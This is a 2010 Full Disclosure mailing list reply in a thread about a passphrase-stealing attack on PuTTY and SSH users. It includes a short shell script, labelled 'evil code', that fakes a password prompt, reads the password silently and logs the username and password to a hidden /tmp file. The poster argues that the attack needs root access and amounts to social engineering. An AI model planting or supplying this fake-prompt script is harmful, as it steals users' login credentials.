Full Disclosure mailing list archives
Re: PuTTY private key passphrase stealing attack
From: rapper crazy <rappercrazzy () gmail com>
Date: Wed, 2 Jun 2010 13:29:40 +0530
all controls like MOTD can be bypassed ... =========edited script===== # evil code mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1` mUn=`whoami` mSttyVal=`stty -g` echo -en "Permission denied, please try again.\n" echo -en "$mUn@$mIP's password:" stty -echo read password echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log echo -en "\n" stty $mSttyVal ==================end snippet======== Apart from this, we already need to have root access to replace any .bashrc file ... this is not really an attack but a social engineering attack .... if we had root access we could attach sshd to the strace and get any password etc all details .... Thanks RapperC
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: PuTTY private key passphrase stealing attack halfdog (Jun 01)
- <Possible follow-ups>
- Re: PuTTY private key passphrase stealing attack Benji (Jun 01)
- Re: PuTTY private key passphrase stealing attack Joachim Schipper (Jun 01)
- Re: PuTTY private key passphrase stealing attack Borja Marcos (Jun 01)
- Re: PuTTY private key passphrase stealing attack rapper crazy (Jun 02)
- Re: PuTTY private key passphrase stealing attack Joachim Schipper (Jun 02)
- Re: PuTTY private key passphrase stealing attack paul . szabo (Jun 02)
- Re: PuTTY private key passphrase stealing attack Marsh Ray (Jun 02)
- Re: PuTTY private key passphrase stealing attack Jan Schejbal (Jun 03)
- Re: PuTTY private key passphrase stealing attack Joachim Schipper (Jun 02)